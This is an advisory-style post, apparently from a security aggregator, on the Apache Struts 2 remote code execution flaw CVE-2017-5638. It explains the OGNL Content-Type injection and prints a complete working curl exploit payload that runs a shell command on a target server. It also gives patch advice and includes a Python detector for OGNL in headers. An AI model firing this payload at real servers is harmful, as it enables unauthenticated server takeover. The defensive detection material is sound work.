How the CVE works:
CVE-2017-5638 resides in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent in an HTTP request to a Struts-based application. The parser mishandles the exception thrown during file upload validation when an invalid `Content-Type` value is supplied: the header value ends up in the error path where it is evaluated as an Object-Graph Navigation Language (OGNL) expression. An attacker can therefore embed an OGNL expression in the `Content-Type` header, and the flawed exception handling causes the server to evaluate it. Because OGNL expressions can execute arbitrary system commands, an unauthenticated attacker achieves full Remote Code Execution with the privileges of the Struts application server, using nothing more than a single crafted HTTP request.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How to Exploit:
The attacker crafts an HTTP request carrying an OGNL expression in the `Content-Type` header. A public exploit is available. The result is unauthenticated Remote Code Execution.
Protection from this CVE:
Apply the official patch by upgrading to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious `Content-Type` headers.
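One way to implement the header filtering mentioned above, as an added example that is not part of the original post or of Undercode's material: a Python check that flags `Content-Type` values carrying OGNL expression syntax, rejects anything that is not a well-formed `multipart/form-data` header on an upload endpoint, and is run over a few constructed request log lines (the log format and the `classify_content_type`/`scan_log` names are assumptions made for this example).

```python
"""Detect OGNL injection attempts in Content-Type headers (CVE-2017-5638)."""
import re

# Expression syntax that has no business in a Content-Type value:
# OGNL delimiters, variable references and static class references.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#[A-Za-z_]|@[A-Za-z_][\w.]*@")

# Strict grammar for a legitimate upload header: "multipart/form-data" with an
# optional boundary parameter built from the RFC 2046 boundary character set.
MULTIPART_OK = re.compile(
    r"^multipart/form-data(?:\s*;\s*boundary=[\w'()+,\-./:=?]{1,70})?$", re.I
)

# Constructed log format (not a real server format): <ip> "<method> <path>" ct="<header>"
LOG_LINE = re.compile(r'^(\S+) "(\S+) (\S+)" ct="([^"]*)"$')


def classify_content_type(value: str) -> str:
    """Return 'ognl' if the header carries expression syntax, 'unexpected' if
    it is not a well-formed multipart/form-data header, otherwise 'ok'."""
    if OGNL_MARKERS.search(value):
        return "ognl"
    if not MULTIPART_OK.match(value.strip()):
        return "unexpected"
    return "ok"


def scan_log(lines):
    """Return (client_ip, verdict, header) for every parsable line whose
    Content-Type is not 'ok'; malformed lines are skipped, not flagged."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, _path, ct = m.groups()
        verdict = classify_content_type(ct)
        if verdict != "ok":
            hits.append((ip, verdict, ct))
    return hits


# Constructed sample traffic: one benign upload, one OGNL probe, one wrong type.
SAMPLE_LOG = [
    '10.0.0.5 "POST /upload.action" ct="multipart/form-data; boundary=----abc123"',
    '10.0.0.9 "POST /upload.action" ct="%{(1+1)}"',
    '10.0.0.7 "POST /upload.action" ct="application/json"',
]

if __name__ == "__main__":
    for ip, verdict, ct in scan_log(SAMPLE_LOG):
        print(f"{ip}: {verdict}: {ct}")
```

Such a filter is a stopgap that buys time for the upgrade, not a replacement for it, since the vulnerable code path evaluates the header value regardless of which client sent it.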
Impact:
Complete system compromise. Unauthorized data access. Server takeover.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode